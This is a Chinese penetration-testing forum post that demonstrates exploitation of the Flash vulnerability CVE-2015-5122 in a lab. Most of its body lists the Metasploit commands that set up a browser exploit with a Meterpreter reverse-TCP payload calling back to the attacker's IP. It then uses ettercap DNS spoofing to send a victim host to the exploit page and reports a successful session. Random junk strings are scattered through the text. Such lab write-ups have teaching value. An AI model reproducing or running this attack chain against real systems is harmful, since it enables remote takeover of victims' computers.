中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

$ z8 D) H5 R7 x' q 二、cve2015-5122漏洞实例演示虚拟机 C _$ E- \4 }! \

N* c0 s# A! b 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： , Q' u3 }+ S: x- ^

) V6 T7 E6 @ U' Q9 S: e search cve-2015-5122如图： " F7 d* t. U# {# Z) V( E L$ t

; P% {7 Z6 @- `/ W 7 {. c6 D% O; ?2 p, p: t

2 v0 e+ j( l3 a/ Y% S2 } 下面我们敲如下命令： [# |6 j! n1 G0 `! _ e$ G" k

3 V( j" E5 f! {: X0 `! R use exploit/multi/browser/adobe_flash_opaque_background_uaf * @/ f/ U7 p6 Y8 ?

3 d+ W1 |6 R+ |2 _ set PAYLOAD windows/meterpreter/reverse_tcp 0 c" R. I& H! k5 I6 v( e9 [+ [

4 [ X$ j) i9 P3 u9 ? set LHOST 192.168.0.109 + o9 B. f4 g7 { h( ]

! p6 H6 `4 g5 s0 G. [ set URIPATH / /*根目录*/ c3 i% {/ s3 R* I/ ?

- k C6 m: B4 Y' Z( }) N8 } set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 . b# i+ M1 O, P5 p" Y1 y

, ^ @7 g0 C; v7 l/ C6 D# L& T set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 7 Y0 Q m0 N) N" D: D8 Q

- ~, B( E- g7 K" x- }& r 然后show options如图： % y! d+ G7 c6 O* p

* O8 \ O" O1 F * c0 ^3 Q6 `# h& \; _7 `

, |1 x% v. n' Y, ~; ?" t* H4 z M6 q 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
( a* c8 v" ^/ W7 _! [ 4 P# O. b2 \+ u

9 c+ C3 S0 Y. O6 D 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ' H k- z5 {+ h. f

8 J- Q( a8 w& M8 } Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf - D7 K2 x& e! @) e; m. P

* N9 C7 L" k, l / x4 [4 m6 ~1 U! R/ l9 O% h. H9 K

( a9 y- p6 [! [$ l 成功了，这时候我们断开ettercap，如图： 8 F! c: W/ e7 U4 K2 V7 j

, w1 X3 v( F) `$ f2 c$ r! z& w # [0 \( T4 z1 z! z

$ Z2 j& k2 [$ |, k# Y; |, N Screenshot如图： 5 ?5 R7 p/ G- i

& C- k0 C8 V, g/ G; M, i2 t2 U ( k, j6 R! a( ?

7 ?" V7 q) q+ l" L. B p : [+ v/ B. x' O G/ X* e: f+ L8 I

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)